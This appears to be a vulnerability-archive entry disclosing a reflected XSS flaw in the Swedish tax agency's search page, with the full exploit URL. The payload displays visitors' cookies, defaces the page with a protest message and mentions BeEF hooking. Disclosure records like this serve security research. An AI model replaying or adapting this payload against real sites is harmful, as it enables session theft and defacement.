Security researcher DellNull, has submitted on 15/05/2009 a cross-site-scripting (XSS) vulnerability affecting www.skatteverket.se, which at the time of submission ranked 17998 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 21/11/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 15/05/2009 |
Date published: 21/11/2010 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: DellNull |
Domain: www.skatteverket.se |
Category: XSS |
Pagerank: 17998 |
|---|
URL: http://www.skatteverket.se/funktioner/sok/sok.4.5732cd2411150a57de580004325.html?sv.search.query.all
words=%3CSCRIPT%3E%3C%2FSCRIPT%3E%3CSCRIPT%3Ealert(%27This+is+a+cookie+from+the+Swedish+National+Tax
+Board!\n%27%2Bdocument.cookie)%3B%3C%2FSCRIPT%3E%3Ch1%3E%3Cfont+color%3D%22red%22+size%3D%22%2B5%22
%3EThe+Swedish+National+Tax+Board!+%3Cbr%3E+You+take+more+than+47%25+of+peoples+income+as+burden+of+
taxation.+I%27m+sure+not+a+penny+of+that+is+invested+in+security%2C+see+%3Ca+href+%3D%27http%3A%2F%2
Fxssed.com%2Fsearch%3Fkey%3Dskatteverket.se%27%3Ehttp%3A%2F%2Fxssed.com%2Fsearch%3Fkey%3Dskatteverke
t.se%3C%2Fa%3E+It%27s+a+shame+that+a+government+authority+that+handles+sensitive+record+about+swedis
h+citizens+is+prone+to+security+flaws+in+their+systems!+What+if+someone+places+a+xss+proxy+hook+(lik
e+BeEF)+here%3F+The+privacy+for+swedish+citizens+is+supposed+to+be+protected+by+constitutional+laws.
+So+live+by+the+law+or+die+by+the+law%3Cbr%3E%3Cbr%3E-+DellNull%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cimg+src%3D
%27http%3A%2F%2Ftreesflowersbirds.files.wordpress.com%2F2009%2F02%2Ftax-collector.jpg%27%3E%3C%2Ffon
t%3E%3C%2Fh1%3E&submit=S%C3%B6k&sv.search.hits.startonhit=0 |
|
Click here to view the mirror
|
|
|
| 
